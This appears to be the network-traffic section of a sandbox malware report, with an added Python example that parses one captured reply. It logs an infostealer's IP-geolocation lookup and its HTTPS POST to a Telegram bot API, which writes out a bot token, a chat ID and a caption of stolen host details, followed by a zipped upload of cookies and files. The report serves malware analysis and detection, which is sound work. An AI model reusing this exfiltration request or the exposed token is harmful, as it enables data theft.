                                 Jul 29, 2024 07:32:07.108586073 CEST | 53 | 59075 | 1.1.1.1 | 192.168.2.5
                                 Jul 29, 2024 07:32:42.773597956 CEST | 63453 | 53 | 192.168.2.5 | 1.1.1.1
                                 Jul 29, 2024 07:32:42.780849934 CEST | 53 | 63453 | 1.1.1.1 | 192.168.2.5
                                 Jul 29, 2024 07:32:54.611639977 CEST | 62773 | 53 | 192.168.2.5 | 1.1.1.1
                                 Jul 29, 2024 07:32:54.618921995 CEST | 53 | 62773 | 1.1.1.1 | 192.168.2.5
                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                 Jul 29, 2024 07:32:07.100429058 CEST | 192.168.2.5 | 1.1.1.1 | 0x412c | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
                                 Jul 29, 2024 07:32:42.773597956 CEST | 192.168.2.5 | 1.1.1.1 | 0x4997 | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
                                 Jul 29, 2024 07:32:54.611639977 CEST | 192.168.2.5 | 1.1.1.1 | 0x4534 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                 Jul 29, 2024 07:32:07.108586073 CEST | 1.1.1.1 | 192.168.2.5 | 0x412c | No error (0) | ipwho.is |  | 195.201.57.90 | A (IP address) | IN (0x0001) | false
                                 Jul 29, 2024 07:32:42.780849934 CEST | 1.1.1.1 | 192.168.2.5 | 0x4997 | No error (0) | ipwho.is |  | 195.201.57.90 | A (IP address) | IN (0x0001) | false
                                 Jul 29, 2024 07:32:54.618921995 CEST | 1.1.1.1 | 192.168.2.5 | 0x4534 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                • api.telegram.org
                                • ipwho.is
                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 0 | 192.168.2.5 | 49704 | 195.201.57.90 | 80 | 1996 | C:\Users\user\Desktop\765iYbgWn9.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Jul 29, 2024 07:32:07.119781017 CEST | 59 | OUT | GET /?output=json HTTP/1.1
                                accept: */*
                                host: ipwho.is
                                 Jul 29, 2024 07:32:07.768171072 CEST | 950 | IN | HTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:07 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:07-04:00"}}0


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 1 | 192.168.2.5 | 49712 | 195.201.57.90 | 80 | 1996 | C:\Users\user\Desktop\765iYbgWn9.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Jul 29, 2024 07:32:42.787456036 CEST | 59 | OUT | GET /?output=json HTTP/1.1
                                accept: */*
                                host: ipwho.is
                                 Jul 29, 2024 07:32:44.409780025 CEST | 950 | IN | HTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
                                 Jul 29, 2024 07:32:44.410648108 CEST | 950 | IN | HTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
                                 Jul 29, 2024 07:32:44.410871029 CEST | 950 | IN | HTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
                                 Jul 29, 2024 07:32:44.412189960 CEST | 950 | IN | HTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
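The reply above is the public-IP lookup the sample makes against ipwhois.io before it reports in: a chunked JSON body whose chunk-size line ("2c6", hex for 710) and terminating "0" chunk are run together with the JSON in the ASCII rendering. The same values (IP, country, city, postal code, ISP "Level" plus ASN 3356 rendered as "Level - A3356", UTC offset -04:00) reappear in the Telegram caption captured in the next session. The following is an added example, not code from the report or from the sample: it reconstructs the response from the bytes shown here with the CRLF chunk framing restored, de-chunks the body, parses the JSON and picks out those fields. The names dechunk, split_response, ip_info and analyse_ipwhois are this example's own.

```python
"""Reassemble and parse the chunked ipwhois.io reply captured above.
Added example for this report, not code from Joe Sandbox or from the sample. The
response bytes are reconstructed from the capture on this page: status line and
headers as shown, then the single 0x2c6-byte chunk and the terminating zero-length
chunk with their CRLF framing restored."""
import json

IPWHOIS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 29 Jul 2024 05:32:43 GMT\r\n"
    b"Content-Type: application/json; charset=utf-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: keep-alive\r\n"
    b"Server: ipwhois\r\n"
    b"Access-Control-Allow-Headers: *\r\n"
    b"X-Robots-Tag: noindex\r\n"
    b"\r\n"
    b"2c6\r\n"  # chunk-size line: 0x2c6 = 710 bytes of JSON follow
    rb'{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America",'
    rb'"continent_code":"NA","country":"United States","country_code":"US",'
    rb'"region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,'
    rb'"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1",'
    rb'"capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg",'
    rb'"emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},'
    rb'"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},'
    rb'"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00",'
    rb'"current_time":"2024-07-29T01:32:43-04:00"}}'
    b"\r\n0\r\n\r\n"  # CRLF closing the chunk, then the zero-length last chunk
)

def dechunk(body):
    """Reassemble a Transfer-Encoding: chunked body (RFC 9112 section 7.1): each chunk is
    '<hex size>[;extension]' CRLF data CRLF; a zero size ends the body and any trailer
    fields after it are ignored. A short or mis-framed chunk raises rather than
    silently returning a partial body."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) < size:
            raise ValueError("truncated chunk: expected %d bytes, got %d" % (size, len(chunk)))
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF (wrong chunk size?)")
        out += chunk
        pos += size + 2

def split_response(raw):
    """Split a raw HTTP/1.1 response into (status code, lower-cased headers, decoded body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    elif "content-length" in headers:
        body = body[:int(headers["content-length"])]
    return status, headers, body

def ip_info(doc):
    """The ipwhois fields that reappear in the stealer's 'IP Info' caption block:
    IP, Country, City, Postal, ISP plus ASN ('Level - A3356'), and the UTC offset."""
    return {"ip": doc["ip"], "country": doc["country"], "city": doc["city"],
            "postal": doc["postal"], "isp": doc["connection"]["isp"],
            "asn": doc["connection"]["asn"], "utc_offset": doc["timezone"]["utc"]}

def analyse_ipwhois(raw):
    """Status, headers, decoded body length and the extracted IP info for one captured reply."""
    status, headers, body = split_response(raw)
    return {"status": status, "headers": headers, "body_length": len(body),
            "ip_info": ip_info(json.loads(body))}

if __name__ == "__main__":
    result = analyse_ipwhois(IPWHOIS_RESPONSE)
    print(result["status"], result["body_length"], "bytes after de-chunking")
    for key, value in result["ip_info"].items():
        print("%-10s %s" % (key, value))
```

De-chunking first matters for detection content: a rule that looks for the ipwhois JSON keys in the raw stream works here only because the whole body fits one chunk; a multi-chunk reply would interleave size lines with the JSON, so match on the reassembled body, not on the wire bytes.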


Session ID: 0
Source IP: 192.168.2.5
Source Port: 49713
Destination IP: 149.154.167.220
Destination Port: 443
PID: 1996
Process: C:\Users\user\Desktop\765iYbgWn9.exe

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 1236
Direction: OUT
Data: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Co [TRUNCATED]
                                content-type: multipart/form-data; boundary=a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1
                                content-length: 891245
                                accept: */*
                                host: api.telegram.org
Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 15148
Direction: OUT
Data Raw: 2d 2d 61 38 32 33 30 30 36 61 31 32 64 34 63 33 37 30 2d 36 31 33 34 35 35 35 30 62 33 38 62 32 30 38 62 2d 38 65 35 37 35 31 34 66 34 64 37 65 34 62 63 30 2d 34 64 35 38 34 38 65 64 30 39 65 31 63 39 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 38 2e 34 36 2e 31 32 33 2e 33 33 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 22 3b fd 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 22 3b fd 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00
Data Ascii: --a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1
Content-Disposition: form-data; name="document"; filename="[US]_8.46.123.33.zip"
Content-Type: application/zip

PK";XAutofill/PK";X
Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: d3 5a a3 94 c2 38 8e 48 62 b1 58 60 9b 71 1c 89 08 24 61 9b cc c4 36 11 41 44 90 99 4c d3 44 8d 40 12 00 92 00 b0 0d 80 6d 6c 13 11 d4 5a 19 c7 11 80 ae eb 98 a6 89 cc 24 54 91 44 44 00 d0 5a a3 b5 06 40 29 85 5a 2b d3 34 61 1b 49 d8 a6 b5 06 40 29 05 49 dc 4f 12 00 99 09 80 24 6a ad 64 26 99 49 66 72 3f 49 00 d8 26 22 90 84 6d 6c 03 20 09 49 d8 26 33 09 89 88 20 33 19 c7 11 49 74 5d 47 66 22 89 d6 1a 11 81 6d 5a 6b d4 5a 91 84 6d 5a 6b 64 26 a5 14 4a 29 00 d8 06 40 86 cc c4 36 00 11 81 24 32 93 cc a4 d6 ca fd 6c 93 99 00 44 04 92 98 a6 89 88 20 22 90 04 80 6d 00 24 61 9b d6 1a b6 89 08 22 82 07 1a 86 81 ae eb 98 a6 09 67 52 bb 8e cc 24 33 99 cd 66 8c e3 c8 fd 24 21 09 00 db 64 26 b3 da 91 99 d8 c6 36 11 c1 fd 6c 63 1b 49 48 22 22 00 b0 4d 6b 8d cc a4 eb
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: 6d 5e 18 f1 ef 63 9b 17 2e f9 b7 90 04 80 26 fe 43 d8 e6 45 61 9b 7f 0d f1 c2 d9 e6 df 43 69 fe 5d d2 fc 47 b0 8d 6d 00 24 f1 af 15 e6 59 6c f3 dc c4 bf 8d 6d 5e 18 99 67 b1 cd bf c4 36 2f 8a 30 2f 12 f1 c2 d9 06 40 12 f7 b3 0d 80 6d 24 01 60 9b 07 b2 0d 40 41 bc 30 32 cf c3 36 2f 88 6d 9e 1f 49 3c 90 6d 2e 4b f3 fc d8 06 c0 36 11 01 80 6d 6c 23 09 00 db 48 e2 85 09 9e 93 6d 1e 48 12 cf cd 36 f7 93 79 a1 24 61 1b db d8 e6 b9 95 52 50 9a cc c4 36 00 92 90 84 24 5a 6b 48 e2 b9 49 e2 32 1b 00 49 d8 06 c0 36 b6 b1 4d 20 00 6c 63 9b 88 a0 94 82 6d 5a 6b dc cf 36 00 92 00 90 84 24 32 93 07 92 04 80 6d 00 32 93 52 0a 00 ad 35 00 4a 29 00 b4 d6 28 08 49 00 64 26 00 11 81 24 6c 93 99 b4 d6 e8 ba 8e 52 0a eb f5 1a db f4 7d 0f 40 66 62 9b fb 49 e2 81 64 90 8d 6d 00
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: 33 c9 4c 6c 53 4a a1 b5 46 6b 8d ae eb 68 ad 51 14 dc cf 36 cf 4d 12 d3 34 01 50 4a 41 12 ad 35 24 11 11 4c d3 04 80 24 24 21 89 07 9a a6 09 49 48 42 12 00 92 90 84 24 32 93 07 b2 cd fd 24 61 9b fb d9 c6 36 00 b6 71 26 42 48 02 40 12 92 90 84 24 24 91 99 64 26 00 92 90 84 6d 00 24 71 3f db 48 42 12 92 00 b0 4d 6b 0d db 48 22 22 00 b0 0d 80 24 6c 93 99 00 48 02 c0 36 92 90 84 27 23 89 fb 49 42 12 b6 b1 8d c2 74 5d 47 66 32 8e 23 11 41 44 70 3f db b4 d6 00 28 a5 20 89 d6 1a b6 89 08 e4 20 22 b0 4d 66 02 10 11 44 04 00 99 49 66 62 1b 49 3c 90 24 54 be 6f 6d db 3c 37 0b 24 61 1b 00 03 48 dc 4f 12 00 b6 79 41 1e 52 f6 78 2d dd c6 2b 96 7b 38 c3 11 b6 59 6c 6c b2 b9 b5 c5 d6 d6 16 11 85 17 64 18 47 2e 5c bc c4 fe e1 21 2f 48 b6 c6 c1 fe 25 0e f7 f6 38 d8 bf c4
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: 7e 97 5f fc 89 57 e6 49 6f fe 16 7c f4 df 03 bc 25 bf 78 eb 07 f0 a4 77 fb 70 3e 66 f5 92 f0 a0 97 82 d3 0f 86 a3 4b 00 b0 71 8c e7 70 74 89 e7 b0 71 0c 36 8e f3 2c 47 bb 70 74 89 e7 f1 8c bf c1 cf d8 e4 17 7f f7 4d 78 d2 db bf 27 1f 7d f0 92 f0 a0 97 82 5b 5e 12 8e 2e 71 d9 c6 31 d8 38 8e 36 8f c3 6d 7f 8b 1f 7f 81 5f fc 89 57 e6 49 6f fe 56 7c f4 df 1b 78 4b 7e f1 d6 0f e2 49 6f ff ae 7c f4 7d 0f 42 67 1e 04 1b c7 61 e3 38 6c 1e 83 8d e3 00 08 60 f3 38 6c 1c 87 8d 63 78 b1 c3 0b 75 ee 36 3c 4d 3c f9 e3 cd 97 bd d6 97 f0 ad 1b c7 e1 cc 83 00 e0 68 c6 57 7f f5 db c3 47 bf 23 1f bd 7a 1f 9e fc f3 8f e0 cb 5e eb 5b f9 d6 33 0f 02 5e 92 5f fc f1 47 f2 d3 af fd 95 7c db e6 71 04 e8 f0 31 fc dc 6f bf 31 4f 7a f3 b7 e6 63 fe de f8 c5 3f 9a 27 ff fc 63 f8 b2 d7
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
